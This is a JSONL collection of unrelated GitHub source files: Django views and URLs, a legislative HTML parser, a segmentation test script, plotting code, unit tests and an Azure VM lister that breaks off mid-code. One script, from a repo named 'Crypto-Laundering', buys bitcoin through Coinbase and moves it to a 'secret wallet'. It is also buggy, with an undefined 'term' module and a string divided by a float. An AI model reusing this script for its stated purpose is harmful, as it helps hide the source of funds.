{"seq_id":"74363629492","text":"#!/usr/bin/env python3\n\nfrom ctypes import c_int, pointer, byref\nfrom ctypes import CDLL, POINTER\nfrom time import sleep\n\nCONFIG_ENABLE_MANUAL_MODE = False\n\nnum = c_int(-1)\npnum = pointer(num)\n\nf = CDLL(\"./bgtask.so\").bgtask\nf.argtypes = [POINTER(c_int),]\nf(byref(num))\n\nprint(\"please press the key with a consistent interval repeatedly\")\nprev = 0\nfirstdot = True\nwhile True:\n    
if CONFIG_ENABLE_MANUAL_MODE:\n input()\n else:\n sleep(0.3)\n print()\n cur = num.value\n if prev == cur:\n if firstdot: print()\n print(\" .\", end=\"\")\n firstdot = False\n else:\n if firstdot: print()\n print(\"%4dms\" % cur, end=\"\")\n firstdot = True\n prev = cur\n\n","repo_name":"Un1Gfn/jangaehwepi","sub_path":"ex4_py_byref_pthread/bgtask.py","file_name":"bgtask.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31427563519","text":"from model import *\n\n\ndef printDay(elem):\n print(\"id: \" + str(elem[\"id\"]) + \" Date:\" + elem['date'] + \" t = \" + str(elem['temperature']) + \" in the yard is\" + elem['weather'])\n\n\nwhile True:\n x = 0\n while x < 1 or x > 4:\n print(\"---weather forecast---\")\n print(\"1) get all the data from the diary\")\n print(\"2) get by id\")\n print(\"3) add new day\")\n print(\"4) delete some day\")\n x = int(input())\n if x < 1 or x > 4:\n print(\"enter 1, 2, 3 or 4\")\n if x == 1:\n days = getAll()\n for day in days:\n printDay(day)\n r = input(\"press x to exit or any key to go back \")\n if r == \"x\":\n break\n else:\n if x == 2:\n id = int(input(\"Enter id\"))\n printDay(getById(id))\n r = input(\"press x to exit or any key to go back \")\n if r == \"x\":\n break\n else:\n if x == 3:\n id = int(input(\"Enter id \"))\n t = int(input(\"Enter temperature \"))\n w = input(\"Enter weather type \")\n if add(id, t, w):\n print(\"Added\")\n else:\n print(\"not added\")\n r = input(\"press x to exit or any key to go back \")\n if r == \"x\":\n break\n else:\n if x == 4:\n id = int(input(\"Enter id \"))\n if getById(id):\n print(\"Deleted element:\")\n printDay(delById(id))\n else:\n print(\"Error\")\n r = input(\"press x to exit or any key to go back \")\n if r == \"x\":\n break\n","repo_name":"annaprok/Weather-Diary","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22527424229","text":"# btc_purchase.py\n# purchase Bitcoin using coinbase API\n#\n# HingOn Miu\n\n# https://developers.coinbase.com/api/v2\n# https://github.com/coinbase/coinbase-python\n\nimport io\nimport pycurl\nimport random\nimport string\nimport json\nimport time\nfrom coinbase.wallet.client import Client\n\n\n# your secret blockchain.info wallet (see secret_wallet.py)\nbitcoin_address_of_secret_wallet = \"\"\n\n# USD amount to send to final target eg. 
\"5000\"\nusd_amount = \"\"\n\n# register coinbase account and enable API keys\n# https://developers.coinbase.com/docs/wallet/api-key-authentication\ncoinbase_api_key = \"\"\ncoinbase_api_secret = \"\"\n\n\n\n# create coinbase client with your credentials\nclient = Client(coinbase_api_key, coinbase_api_secret)\n\n\n# fetch default account ID from your coinbase account\nprint(term.format(\"Fetch Account Info\\n\", term.Attr.BOLD))\naccounts_response = client.get_accounts()\nprint(term.format(accounts_response, term.Color.BLUE))\naccount_id = json.loads(accounts_response)[\"data\"][0][\"id\"]\n\n\n# check real time bitcoin price (total USD to buy one bitcoin)\nprint(term.format(\"Check Bitcoin Price\\n\", term.Attr.BOLD))\nbitcoin_price_response = client.get_buy_price(currency_pair = 'BTC-USD')\nprint(term.format(bitcoin_price_response, term.Color.BLUE))\nbitcoin_price = float(json.loads(bitcoin_price_response)[\"data\"][\"amount\"])\n\n\n# convert USD amount to bitcoin\nbitcoin_amount = str(usd_amount / bitcoin_price)\n\n\n# fetch default payment method ID from your coinbase account\nprint(term.format(\"Fetch Payment Method\\n\", term.Attr.BOLD))\npayment_methods_response = client.get_payment_methods()\nprint(term.format(payment_methods_response, term.Color.BLUE))\npayment_method_id = json.loads(payment_methods_response)[\"data\"][0][\"id\"]\n\n\n# buy bitcoin and commit order immediately\nprint(term.format(\"Purchase Bitcoin\\n\", term.Attr.BOLD))\nbuy_response = client.buy(account_id, amount=bitcoin_amount, currency=\"BTC\",\n commit= True, payment_method=payment_method_id)\nprint(term.format(buy_response, term.Color.BLUE))\n\n\n# verify purchase time\nbuy_time = json.loads(buy_response)[\"data\"][\"payout_at\"]\nprint(term.format(\"Purchased Bitcoin at \" + buy_time + \"\\n\", term.Attr.BOLD))\n\n\n# send purchased bitcoin to your secret blockchain.info wallet (see secret_wallet.py)\nprint(term.format(\"Transfer Bitcoin to Secret Wallet\\n\", term.Attr.BOLD))\ntransaction_response = client.send_money(account_id, to=bitcoin_address_of_secret_wallet, \n amount=bitcoin_amount, currency='BTC')\nprint(term.format(transaction_response, term.Color.BLUE))\ntransaction_id = json.loads(transaction_response)[\"data\"][\"id\"]\ntransaction_status = json.loads(transaction_response)[\"data\"][\"status\"]\n\n\n# keep checking until transaction is completed\nprint(term.format(\"Check Transaction Status\\n\", term.Attr.BOLD))\nwhile transaction_status != \"completed\":\n # check status every 5 seconds\n time.sleep(5)\n transaction_response = client.get_transaction(account_id, transaction_id)\n transaction_status = json.loads(transaction_response)[\"data\"][\"status\"]\n print(term.format(transaction_status + \"\\n\", term.Attr.BOLD))\n\n\n# alert transaction is completed\nprint(term.format(\"Bitcoin Transaction Completed\\n\", term.Attr.BOLD))\n\n\n\n\n","repo_name":"miuho/Crypto-Laundering","sub_path":"btc_purchase.py","file_name":"btc_purchase.py","file_ext":"py","file_size_in_byte":3235,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"20585531967","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib.gis import admin\nimport settings\n\nfrom django.contrib.sitemaps.views import sitemap\nfrom django.contrib.sitemaps import FlatPageSitemap, GenericSitemap\nfrom apps.core.models import Recorrido, Linea, Parada\nfrom apps.catastro.models import Poi\n\n# Uncomment the next two lines to enable the 
admin:\nadmin.autodiscover()\n\nsitemaps = {\n 'flatpages': FlatPageSitemap,\n 'lineas': GenericSitemap({\n 'queryset': Linea.objects.all(),\n }, priority=0.6),\n 'recorridos': GenericSitemap({\n 'queryset': Recorrido.objects.all(),\n }, priority=0.6),\n 'pois': GenericSitemap({\n 'queryset': Poi.objects.all(),\n }, priority=0.6),\n 'paradas': GenericSitemap({\n 'queryset': Parada.objects.all(),\n }, priority=0.4),\n}\n\nurlpatterns = patterns('',\n # Archivos estaticos\n (r'^media/(?P.*)$', 'django.views.static.serve', {'document_root': settings.MEDIA_ROOT}),\n\n # APPS de CualBondi\n url(r'^api/v2/', include('apps.api2.urls')),\n url(r'^api/v1/', include('apps.api.urls')),\n url(r'^api/', include('apps.api.urls')),\n url(r'^admin/', include(admin.site.urls)),\n url('', include('social.apps.django_app.urls', namespace='social')),\n url(r'^usuarios/', include('apps.usuarios.urls')),\n url(r'^widget/', include('apps.widget.urls')),\n url(r'^mobile_updates/', include('apps.mobile_updates.urls')),\n url(r'^editor/', include('apps.editor.urls')),\n url(r'^revision/(?P\\d+)/$', 'apps.editor.views.revision', name='revision_externa'),\n\n url(r'^como-llegar/', include('apps.catastro.urls')),\n \n url(r'^contacto/', 'apps.core.views.contacto', name='contacto'),\n \n # Ranking aka agradecimientos\n url(r'^agradecimientos/$', 'apps.core.views.agradecimientos', name='agradecimientos'),\n\n url(r'^sitemap\\.xml$', sitemap, {'sitemaps': sitemaps}, name='django.contrib.sitemaps.views.sitemap'),\n\n url(r'^', include('apps.core.urls')),\n)\n","repo_name":"cualbondi/old-web","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"71484922293","text":"#!/usr/bin/env python\nimport numpy as np\nimport matplotlib.pyplot as plt\nfile=\"../burgers_run.bin\"\nnx=1000\nN=101\nXs=np.fromfile(file, dtype=\"double\", count=-1).reshape(N,nx)\n\n#print(Xs)\nplot_dt=10\n\nxcoord=np.arange(0,nx)\nfor i in range(0,N,plot_dt):\n print(i)\n plt.figure()\n plt.plot(xcoord, Xs[i][:], '-o')\n\n\n\n","repo_name":"shensimeteor/IndepdentStudy_SLAM","sub_path":"Burgers/scripts/plot_burgers.py","file_name":"plot_burgers.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5271843566","text":"import logging\nimport re\nfrom typing import Any, Dict, Iterable, List, Tuple\n\nfrom bs4 import BeautifulSoup\n\nfrom zam_repondeur.exceptions.alert import AlertOnData\nfrom zam_repondeur.models import Lecture, Phase, Texte\nfrom zam_repondeur.services.clean import clean_all_html, clean_html_except_tables\n\nfrom .parseur import Parseur\n\nlogger = logging.getLogger(__name__)\n\nSUFFIXE_URL = {\n # ( partie, phase ) : SUFFIXE\n (1, Phase.PREMIERE_LECTURE): \"A\",\n (1, Phase.DEUXIEME_LECTURE): \"B\",\n (2, Phase.PREMIERE_LECTURE): \"C\",\n (2, Phase.DEUXIEME_LECTURE): \"D\",\n (None, Phase.NOUVELLE_LECTURE): \"\",\n (None, Phase.LECTURE_DEFINITIVE): \"\",\n}\n\nSTOP_TAGS = [\"h1\", \"h2\", \"h3\", \"h4\", \"h5\"]\n\n\nclass ParseurPLF(Parseur):\n \"\"\"\n Parser to handle Projet de loi de finance\n \"\"\"\n\n def __init__(self, lecture: Lecture):\n self.suffixe = SUFFIXE_URL[(lecture.partie, lecture.phase)]\n super().__init__(lecture)\n if not self.suffixe:\n self.parseur_type = \"DEFAULT\"\n else:\n self.parseur_type = \"PLF\"\n\n def get_texte_url(self, lecture: Lecture) -> str:\n \"\"\"\n Infos de 
l'AN pour la construction d'urls:\n La règle concernant le nommage des PLF est la suivante :\n A : 1ere partie, 1ere délibération\n B : 1ere partie, 2e délibération\n C : 2e partie, 1ere délibération\n D : 2e partie, 2e délibération\n \"\"\"\n self.lecture = lecture\n texte: Texte = lecture.texte\n prefix = f\"{self.an_url}{texte.legislature}\"\n numero = f\"{texte.numero:04}\"\n url = f\"{prefix}/textes/{numero}{self.suffixe}.asp\"\n return url\n\n def get_num_article(self, article: BeautifulSoup) -> str:\n\n words = re.compile(r\"\\W+\")\n article_title_raw = clean_all_html(f\"{article}\").replace(\"\\n\", \"\")\n matched_list = words.split(article_title_raw)\n if not matched_list[0] == \"Article\":\n raise AlertOnData(\n f\"Numéro d'article non récupérable {matched_list}\", \"data\", 3\n )\n clean_num = \"\"\n num = re.compile(r\"\\d+\")\n for index, value in enumerate(matched_list[1:]):\n match = num.match(value)\n if not match and index > 0:\n clean_num += \" \"\n clean_num += value\n return clean_num\n\n def clean_pastille_content(self, pastille: BeautifulSoup) -> str:\n if \"\" in f\"{pastille}\":\n content_raw = clean_html_except_tables(f\"{pastille}\").replace(\"\\n\", \"\")\n else:\n content_raw = clean_all_html(f\"{pastille}\").replace(\"\\n\", \"\")\n return re.sub(\" {2,}\", \" \", content_raw).strip()\n\n def is_new_pastille(self, pastille_raw: str) -> bool:\n p = re.compile(r\"\\(\\d+\\)\")\n m = p.match(pastille_raw)\n if m:\n return True\n return False\n\n def is_next_article(self, element: BeautifulSoup) -> bool:\n if \"attrs\" in element.__dict__.keys():\n if \"class\" in element.attrs.keys():\n return \"aFPFTprojetitrarticle\" in element[\"class\"]\n return False\n\n def is_next_titre(self, element: BeautifulSoup) -> bool:\n if \"attrs\" in element.__dict__.keys():\n if \"class\" in element.attrs.keys():\n return (\n \"titre\" in element[\"class\"][0] and \"projet\" in element[\"class\"][0]\n )\n return False\n\n def is_condition_arret(self, element: BeautifulSoup) -> bool:\n if element.name in STOP_TAGS:\n return True\n if self.is_next_article(element):\n return True\n if self.is_next_titre(element):\n return True\n if element.name == \"p\":\n return False\n for child in element.children:\n if child.name in STOP_TAGS:\n return True\n if self.is_next_article(element):\n return True\n if self.is_next_titre(child):\n return True\n return False\n\n def get_next_pastille(self, elements: BeautifulSoup) -> Iterable[str]:\n result: List = []\n for element in elements:\n if self.is_condition_arret(element):\n if result:\n yield \" \".join(result)\n result = []\n break\n current = self.clean_pastille_content(element)\n if not current:\n continue\n new_pastille = self.is_new_pastille(current)\n if new_pastille:\n if result:\n yield \" \".join(result)\n result = [current]\n else:\n result.append(current)\n if result:\n yield \" \".join(result)\n\n def get_articles(self) -> Iterable[Tuple]:\n\n dict_article: Dict[Any, Any] = dict()\n\n content = self.download_html()\n try:\n soup = BeautifulSoup(content, features=\"lxml\")\n except AlertOnData:\n raise\n except Exception:\n logger.error(\n f\"Scraping of lecture {self.lecture}, {self.url} : \\\nErreur lors de l'initialisation de BeautifulSoup\"\n )\n raise AlertOnData(\n f\"Scraping of lecture {self.lecture}, {self.url} : \\\nErreur lors de l'initialisation de BeautifulSoup\",\n \"data\",\n 2,\n )\n dict_article[\"textes\"] = []\n dict_article[\"titre\"] = \"\"\n\n list_articles = soup.find_all(\"p\", attrs={\"class\": 
[\"aFPFTprojetitrarticle\"]})\n\n for article in list_articles:\n dict_article[\"titre\"] = self.get_num_article(article)\n dict_article[\"textes\"] = []\n\n for pastille in self.get_next_pastille(article.find_next_siblings()):\n p = re.compile(r\"\\(\\d+\\)\")\n m = p.match(pastille)\n if m:\n last_pastille_caractere = m.end()\n dict_article[\"textes\"].append(\n pastille[last_pastille_caractere:].strip()\n )\n else:\n dict_article[\"textes\"].append(pastille)\n\n tuple_article = (dict_article[\"titre\"], dict_article[\"textes\"])\n del dict_article[\"textes\"]\n\n yield tuple_article\n\n def transform(self) -> List[Dict[Any, Any]]:\n if self.suffixe == \"\":\n self.logger.info(\"article sans suffixe, utilisation du parseur DEFAULT\")\n parseur = Parseur(self.lecture)\n return parseur.transform()\n else:\n self.logger.info(\"article avec un suffixe\")\n return super().transform()\n","repo_name":"administration-solrep/signale","sub_path":"zam-repondeur-1.17.7/zam_repondeur/services/fetch/an/parser/parseur_plf.py","file_name":"parseur_plf.py","file_ext":"py","file_size_in_byte":6650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13033671704","text":"import argparse\nimport logging\nimport os\nimport random\nimport sys\nimport numpy as np\nimport torch\nimport torch.backends.cudnn as cudnn\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\nfrom datasets.dataset_synapse import Synapse_dataset\nfrom utils import test_single_volume\n\nfrom models.mewunet import MEWUNet\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--volume_path', type=str,\n default='../data/Synapse/test_vol_h5', help='root dir for validation volume data') # for acdc volume_path=root_dir\nparser.add_argument('--dataset', type=str,\n default='Synapse', help='experiment_name')\nparser.add_argument('--num_classes', type=int,\n default=4, help='output channel of network')\nparser.add_argument('--list_dir', type=str,\n default='./lists/lists_Synapse', help='list dir')\n\nparser.add_argument('--max_iterations', type=int,default=20000, help='maximum epoch number to train')\nparser.add_argument('--max_epochs', type=int, default=30, help='maximum epoch number to train')\nparser.add_argument('--batch_size', type=int, default=1,\n help='batch_size per gpu')\nparser.add_argument('--img_size', type=int, default=224, help='input patch size of network input')\nparser.add_argument('--is_savenii', action=\"store_true\", help='whether to save results during inference')\n\nparser.add_argument('--n_skip', type=int, default=3, help='using number of skip-connect, default is num')\nparser.add_argument('--vit_name', type=str, default='ViT-B_16', help='select one vit model')\n\nparser.add_argument('--test_save_dir', type=str, default='../predictions', help='saving prediction as nii!')\nparser.add_argument('--deterministic', type=int, default=1, help='whether use deterministic training')\nparser.add_argument('--base_lr', type=float, default=0.01, help='segmentation network learning rate')\nparser.add_argument('--seed', type=int, default=1234, help='random seed')\nparser.add_argument('--vit_patches_size', type=int, default=16, help='vit_patches_size, default is 16')\nargs = parser.parse_args()\n\n\ndef inference(args, model, test_save_path=None):\n db_test = args.Dataset(base_dir=args.volume_path, split=\"test_vol\", list_dir=args.list_dir)\n testloader = DataLoader(db_test, batch_size=1, shuffle=False, num_workers=1)\n logging.info(\"{} 
test iterations per epoch\".format(len(testloader)))\n model.eval()\n metric_list = 0.0\n for i_batch, sampled_batch in tqdm(enumerate(testloader)):\n h, w = sampled_batch[\"image\"].size()[2:]\n image, label, case_name = sampled_batch[\"image\"], sampled_batch[\"label\"], sampled_batch['case_name'][0]\n metric_i = test_single_volume(image, label, model, classes=args.num_classes, patch_size=[args.img_size, args.img_size],\n test_save_path=test_save_path, case=case_name, z_spacing=args.z_spacing)\n metric_list += np.array(metric_i)\n logging.info('idx %d case %s mean_dice %f mean_hd95 %f' % (i_batch, case_name, np.mean(metric_i, axis=0)[0], np.mean(metric_i, axis=0)[1]))\n metric_list = metric_list / len(db_test)\n for i in range(1, args.num_classes):\n logging.info('Mean class %d mean_dice %f mean_hd95 %f' % (i, metric_list[i-1][0], metric_list[i-1][1]))\n performance = np.mean(metric_list, axis=0)[0]\n mean_hd95 = np.mean(metric_list, axis=0)[1]\n logging.info('Testing performance in best val model: mean_dice : %f mean_hd95 : %f' % (performance, mean_hd95))\n return \"Testing Finished!\"\n\n\nif __name__ == \"__main__\":\n\n if not args.deterministic:\n cudnn.benchmark = True\n cudnn.deterministic = False\n else:\n cudnn.benchmark = False\n cudnn.deterministic = True\n random.seed(args.seed)\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n torch.cuda.manual_seed(args.seed)\n\n dataset_config = {\n 'Synapse': {\n 'Dataset': Synapse_dataset,\n 'volume_path': './data/Synapse/test_vol_h5',\n 'list_dir': './lists/lists_Synapse',\n 'num_classes': 9,\n 'z_spacing': 1,\n },\n }\n dataset_name = args.dataset\n args.num_classes = dataset_config[dataset_name]['num_classes']\n args.volume_path = dataset_config[dataset_name]['volume_path']\n args.Dataset = dataset_config[dataset_name]['Dataset']\n args.list_dir = dataset_config[dataset_name]['list_dir']\n args.z_spacing = dataset_config[dataset_name]['z_spacing']\n\n net = MEWUNet().cuda()\n\n snapshot_path = './our_weights/best-epoch531-mean_dice0.7892-mean_hd9516.4430.pth'\n net.load_state_dict(torch.load(snapshot_path))\n snapshot_name = snapshot_path.split('/')[-1]\n\n log_folder = './test_log/test_log'\n os.makedirs(log_folder, exist_ok=True)\n logging.basicConfig(filename=log_folder + '/'+snapshot_name+\".txt\", level=logging.INFO, format='[%(asctime)s.%(msecs)03d] %(message)s', datefmt='%H:%M:%S')\n logging.getLogger().addHandler(logging.StreamHandler(sys.stdout))\n logging.info(str(args))\n logging.info(snapshot_name)\n\n if args.is_savenii:\n args.test_save_dir = '../predictions'\n test_save_path = os.path.join(args.test_save_dir, snapshot_name)\n os.makedirs(test_save_path, exist_ok=True)\n else:\n test_save_path = None\n inference(args, net, test_save_path)\n\n\n","repo_name":"JCruan519/MEW-UNet","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5377,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"21"} +{"seq_id":"26815085160","text":"import numpy as np\nimport cv2 as cv\nfrom matplotlib import pyplot as plt\nimport random\nimg = cv.imread('temp.jpg',0)\ndef histPlot(img):\n hist,bins = np.histogram(img.flatten(),256,[0,256])\n cdf = hist.cumsum()\n cdf_normalized = cdf * hist.max() / (cdf.max() - cdf.min())\n plt.plot(cdf_normalized, color = 'b')\n plt.hist(img.flatten(),256,[0,256], color = 'r')\n plt.xlim([0,256])\n plt.legend(('cdf','histogram'), loc = 'upper left')\n plt.show()\n\nimg2 = cv.imread('temp.jpg',0)\neq = cv.equalizeHist(img2)\nres = 
np.hstack((img2,eq))\nhistPlot(img2)\nhistPlot(eq)\nplt.imshow(res)\nplt.show()\n# cdf_m = np.ma.masked_equal(cdf,0)\n# cdf_m = (cdf_m - cdf_m.min())*255/(cdf_m.max()-cdf_m.min())\n# cdf = np.ma.filled(cdf_m,0).astype('uint8')\n# image2 = cdf[img]\n# plt.hist(img.flatten(),256,[0,256], color = 'r')\n# plt.xlim([0,256])\n# plt.legend(('cdf','histogram'), loc = 'upper left')\n# plt.show()","repo_name":"yan-code1/TrainingCode","sub_path":"TrainCode/ImgDeal/histq.py","file_name":"histq.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17622085486","text":"import random\n\nfrom main import create_question_bank\nfrom backend.snake_brain import SnakeBrain\n\n\nclass TestSnakeBrain:\n # random.seed(1), numbers == [5, 19, 3, 9, 4, 16, 15, 21, 13, 7]\n random.seed(1)\n question_bank = create_question_bank()\n random.seed()\n\n def test_snakebrain_instance(self):\n brain = SnakeBrain(TestSnakeBrain.question_bank)\n\n assert brain.questions == TestSnakeBrain.question_bank\n assert brain.question_no == 0\n\n def test_next_question(self):\n brain = SnakeBrain(TestSnakeBrain.question_bank)\n text = brain.next_question() \n\n assert brain.question_no == 1 \n assert text == 'Q. 1: A tuple is one of the four built-in data types in Python. Which of these best describes a tuple?'\n\n def test_has_more_questions(self):\n brain = SnakeBrain(TestSnakeBrain.question_bank)\n brain.question_no = 10\n\n assert brain.has_more_questions() == False\n\n def test_check_answer(self):\n brain = SnakeBrain(TestSnakeBrain.question_bank) \n brain.next_question() \n\n assert brain.check_answer('A tuple is a collection which is unchangeable and ordered.') == True\n assert brain.check_answer('A tuple is a collection which is unchangeable and unordered.') == False\n assert brain.score == 1\n\n def test_check_score(self):\n brain = SnakeBrain(TestSnakeBrain.question_bank)\n brain.next_question() \n\n assert brain.check_answer('A tuple is a collection which is unchangeable and ordered.') == True\n brain.question_no = 10\n assert brain.get_score() == (1, 9, 10)\n \n\n","repo_name":"serioh/Group-One-Nano-Project","sub_path":"Tests/test_snake_brain.py","file_name":"test_snake_brain.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"71304105013","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom . 
models import *\nfrom .forms import PostForm, CommentForm\nfrom django.utils import timezone\n\n\n# def home(request):\n# \treturn render(request, \"base.html\")\n\ndef post_list(request):\n\tposts = Articles.objects.all()\n\treturn render(request, 'post_list.html', {'posts': posts})\n\ndef post_detail(request, pk):\n\tpost = get_object_or_404(Articles, pk=pk)\n\treturn render(request, 'post_detail.html', {'post': post})\n\n# @login_required\ndef post_new(request):\n    if request.method == \"POST\":\n        form = PostForm(request.POST)\n        if form.is_valid():\n            post = form.save(commit=False)\n            post.user = request.user\n            post.timestamp = timezone.now()\n            post.save()\n            return redirect('post_detail', pk=post.pk)\n    else:\n        form = PostForm()\n    return render(request, 'post_edit.html', {'form': form})\n\n# @login_required\ndef post_edit(request, pk):\n    post = get_object_or_404(Articles, pk=pk)\n    if request.method == \"POST\":\n        form = PostForm(request.POST, instance=post)\n        if form.is_valid():\n            post = form.save(commit=False)\n            post.user = request.user\n            post.timestamp = timezone.now()\n            post.save()\n            return redirect('post_detail', pk=post.pk)\n    else:\n        form = PostForm(instance=post)\n    return render(request, 'post_edit.html', {'form': form})\n\n# @login_required\ndef post_remove(request, pk):\n    post = get_object_or_404(Articles, pk=pk)\n    post.delete()\n    return redirect('post_list')\n\n\ndef add_comment_to_post(request, pk):\n\tpost = get_object_or_404(Articles, pk=pk)\n\tif request.method == \"POST\":\n\t\tform = CommentForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tcomment = form.save(commit = False)\n\t\t\tcomment.post = post\n\t\t\tcomment.user = request.user\n\t\t\tcomment.timestamp = timezone.now()\n\t\t\tcomment.save()\n\t\t\treturn redirect('post_detail', pk=post.pk)\n\telse:\n\t\tform = CommentForm()\n\treturn render(request, 'add_comment_to_post.html', {'form': form})\n","repo_name":"iamashwinks/GRC_Final","sub_path":"posts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42035780267","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n#plt.rcParams['font.sans-serif'] = ['SimHei']\n#plt.rcParams['axes.unicode_minus'] = False\n\nx = np.linspace(-2 * np.pi, 2 * np.pi, 200) \nf1 = np.sin(x)\nf2 = np.cos(x)\nf3 = np.tan(x)\nf4 = 1 / f3\nf5=1/f2\nf6=1/f1\n#plt.plot(x, f1, label=r'$y=sin(x)$')\n#plt.plot(x, f2, label=r'$y=cos(x)$')\n#plt.plot(x, f3, label=r'$y=tan(x)$')\n#plt.plot(x, f4, label=r'$y=cot(x)$')\nplt.plot(x, f5, label=r'$y=sec(x)$', )\n#plt.plot(x, f6, label=r'$y=csc(x)$', )\n\n#ax = plt.gca()\n#ax.spines['top'].set_color('none')\n#ax.xaxis.set_ticks_position('bottom')\n#ax.yaxis.set_ticks_position('left')\n#ax.spines['bottom'].set_position(('data', 0))\n#ax.spines['left'].set_position(('data', 0))\n\nplt.xlim(x.min() * 1.1, x.max() * 1.1)  # limit x range\nplt.ylim(-4, 4)  # limit y range\n#plt.xticks([-2 * np.pi, -3 * np.pi / 2, -np.pi, -np.pi / 2, 0, np.pi / 2, np.pi, 3 * np.pi / 2, 2 * np.pi],\n    #[r'$-2\\pi$', r'$-3\\pi/2$', r'$-\\pi$', r'$-\\pi/2$', r'$0$', r'$\\pi/2$', r'$\\pi$', r'$3\\pi/2$', r'$2\\pi$'])\n#plt.legend(loc='best')\nplt.show()\n","repo_name":"OuJunLin/Python-math_graph","sub_path":"Test04.py","file_name":"Test04.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70904120052","text":"import os\n\nclass Writer:\n    def 
write_file(self, write_in, tmp_file, data, mode):\n print(\"Going to write: \" + data + \" in file:\" + write_in)\n #Writes file 'write_in' with 'data' using a temp file passed\n f = open(tmp_file, mode)\n f.write(data)\n f.flush()\n os.fsync(f.fileno()) \n f.close()\n\n #Is atomic\n os.rename(tmp_file, write_in)\n print(\"Writer finished working\")","repo_name":"fedefunes96/tp3-sistemas-distribuidos","sub_path":"cluster_manager/writer/writer.py","file_name":"writer.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5703817219","text":"from typing import List\nimport os, json\n\nfrom banyan.ext.iaas.base import IaasAccount, IaasResource, IaasInstance, IaasRegion, IaasConf, IaasController\n \nfrom azure.identity import DefaultAzureCredential\nfrom azure.mgmt.resource import ResourceManagementClient\nfrom azure.mgmt.compute import ComputeManagementClient\nfrom azure.mgmt.network import NetworkManagementClient\n\n\nclass AzureController(IaasController):\n def __init__(self, filter_by_resource_group: str, filter_by_location: str = None, filter_by_tag_name: str = None):\n self._provider = 'azure'\n _azure_subscription_id = os.getenv('AZURE_SUBSCRIPTION_ID')\n _azure_tenant_id = os.getenv('AZURE_TENANT_ID')\n _azure_client_id = os.getenv('AZURE_CLIENT_ID')\n _azure_client_secret = os.getenv('AZURE_CLIENT_SECRET')\n if not _azure_subscription_id:\n _creds = IaasConf.get_creds(self._provider)\n _azure_subscription_id = _creds['azure_subscription_id']\n _azure_tenant_id = _creds['azure_tenant_id']\n _azure_client_id = _creds['azure_client_id']\n _azure_client_secret = _creds['azure_client_secret']\n\n try:\n os.environ['AZURE_SUBSCRIPTION_ID'] = _azure_subscription_id\n os.environ['AZURE_TENANT_ID'] = _azure_tenant_id\n os.environ['AZURE_CLIENT_ID'] = _azure_client_id\n os.environ['AZURE_CLIENT_SECRET'] = _azure_client_secret \n self._credential = DefaultAzureCredential() # needs env vars\n self._subscription_id = _azure_subscription_id # for clients\n resource_client = ResourceManagementClient(self._credential, self._subscription_id)\n except Exception as ex:\n print('AzureSDKError > %s' % ex.args[0])\n raise\n self._filter_by_resource_group = filter_by_resource_group\n self._filter_by_location = filter_by_location\n self._filter_by_tag_name = filter_by_tag_name\n\n try:\n self._resource_group_list = resource_client.resource_groups.list()\n except Exception as ex:\n print('AzureControllerError > %s' % ex.args[0])\n raise\n\n\n def list_vm(self):\n res_type = 'vm'\n compute_client = ComputeManagementClient(self._credential, self._subscription_id)\n network_client = NetworkManagementClient(self._credential, self._subscription_id)\n\n # VMs in all resource groups\n vm_list = compute_client.virtual_machines.list_all()\n\n instances: List[IaasResource] = list()\n for vm in list(vm_list):\n #print(json.dumps(vm.as_dict(), indent=4))\n vm_loc = vm.location\n vm_tags = vm.tags or dict()\n vm_reference = vm.id.split('/')\n vm_rg = vm_reference[4]\n ni_reference = vm.network_profile.network_interfaces[0].id.split('/')\n ni_name = ni_reference[8]\n\n # implement filtering\n if self._filter_by_resource_group != 'all' and self._filter_by_resource_group != vm_rg:\n continue\n if self._filter_by_location and self._filter_by_location != vm_loc:\n continue\n if self._filter_by_tag_name and not vm_tags.get(self._filter_by_tag_name):\n continue\n\n # check network interface for address\n net_interface = 
